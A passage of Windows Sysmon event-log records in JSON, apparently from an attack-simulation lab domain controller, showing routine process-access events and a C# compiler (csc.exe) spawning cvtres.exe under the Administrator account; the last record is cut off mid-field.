{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001073E00900}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001073E00900}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.138\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001056E40900}\r\nProcessId: 4812\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESCF4E.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC5966A98DADB44ED99373AD768161B38B.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-001073E00900}\r\nParentProcessId: 2984\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4ioguru5.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.138","ProcessGuid":"{A837DB8D-032B-5F25-0000-001056E40900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESCF4E.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC5966A98DADB44ED99373AD768161B38B.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-001073E00900}","ParentProcessId":"2984","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4ioguru5.cmdline\"","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-001073E00900}\r\nSourceProcessId: 2984\r\nSourceThreadId: 3544\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001056E40900}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-001073E00900}","SourceProcessId":"2984","SourceThreadId":"3544","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001056E40900}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001056E40900}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001056E40900}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 